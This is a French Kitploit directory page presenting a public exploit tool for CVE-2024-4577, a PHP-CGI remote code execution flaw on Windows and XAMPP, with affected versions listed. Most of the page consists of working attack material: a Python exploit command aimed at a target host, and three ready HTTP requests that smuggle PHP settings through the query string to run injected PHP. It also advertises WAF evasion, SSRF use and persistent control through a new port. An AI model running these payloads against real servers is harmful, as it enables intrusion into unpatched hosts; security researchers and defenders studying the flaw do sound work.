Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-4577-PHP-RCE — [Reproduction de vulnérabilité] Premier exploit mondial de la vulnérabilité CVE-2024-4577 PHP-CGI RCE utilisant l'environnement PHP par défaut (XAMPP). | Kitploit
Outils/GitHubGitHub/xcanwin/cve-2024-4577-php-rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebContournement de WAFTests d'IntrusionDéveloppement de Charges Utiles
GitHubxcanwin/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

[Reproduction de vulnérabilité] Premier exploit mondial de la vulnérabilité CVE-2024-4577 PHP-CGI RCE utilisant l'environnement PHP par défaut (XAMPP).

Voir le dépôt
1623312il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-4577-PHP-RCE

Présentation du projet et principe

  • Premier exploit au monde utilisant l'environnement PHP par défaut (XAMPP) pour la vulnérabilité CVE-2024-4577 PHP-CGI RCE.
  • The world's first CVE-2024-4577 PHP-CGI RCE exploit utilizing the default PHP environment. Sharing original exploit, supports SSRF, supports WAF bypass.
  • Permet une exécution de code à distance (RCE) dans l'environnement PHP par défaut. Principe : cgi.force_redirect + REDIRECT-STATUS.
  • Nouvel exploit original, prend en charge les scénarios de contournement WAF. Principe : création d'un serveur FastCGI + communication via le protocole FastCGI.
  • Nouvel exploit original, prend en charge les scénarios SSRF. Principe : protocole data:// + requête GET.

Avantages de EXP 1

  • Permet une RCE sans nécessiter allow_url_include, auto_prepend_file, auto_append_file. Peut inclure n'importe quel fichier ainsi que des fichiers PHP.
  • Évite les mots-clés souvent bloqués par les WAF : allow_url_include, auto_prepend_file, auto_append_file.
  • Toutes les communications du serveur FastCGI ne sont pas enregistrées par le WAF.
  • Écoute sur un nouveau port, permettant ainsi un contrôle persistant du serveur PHP, indépendant d'Apache et de PHP.

Présentation de la vulnérabilité

InformationContenu
Nom de la vulnérabilitéPHP RCE
Identifiant CVECVE-2024-4577
Niveau de risqueÉlevé
Type de vulnérabilitéRCE
Difficulté d'exploitationFaible

Versions concernées

  • PHP Windows 8.3.0 <= versions concernées < 8.3.8
  • PHP Windows 8.2.0 <= versions concernées < 8.2.20
  • PHP Windows 8.1.0 <= versions concernées < 8.1.29
  • PHP Windows versions concernées == 8.0.x
  • PHP Windows versions concernées == 7.x
  • PHP Windows versions concernées == 5.x
  • XAMPP Windows 8.2.0 <= versions concernées <= 8.2.12
  • XAMPP Windows 8.1.0 <= versions concernées <= 8.1.25
  • XAMPP Windows versions concernées == 8.0.x
  • XAMPP Windows versions concernées == 7.x
  • XAMPP Windows versions concernées == 5.x

EXP 1

Utilisable dans les scénarios de contournement WAF + scénario par défaut :

python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort

Exemple :

python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80

EXP 2

Utilisable dans les scénarios SSRF + scénario par défaut :

http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"

EXP 3

Utilisable dans le scénario par défaut :

POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost

<?php die("Te"."sT");?>

EXP 4

Utilisable dans le scénario par défaut :

POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost
REDIRECT-STATUS: XCANWIN

<?php die("Te"."sT");?>

Reproduction

  1. Environnement serveur :
XAMPP Windows 8.2.12
  1. Téléchargement et installation de XAMPP sur le serveur :
https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1

Ou bien choisir une version affectée sur : https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/
  1. Configuration serveur
Aucune modification nécessaire, conserver la configuration par défaut
  1. Utilisation de l'exploit par le client
Tester avec les exploits ci-dessus
  1. Validation
Vérifier si la chaîne "TesT" apparaît, ou le contenu du fichier system.ini du serveur
Télécharger l’outil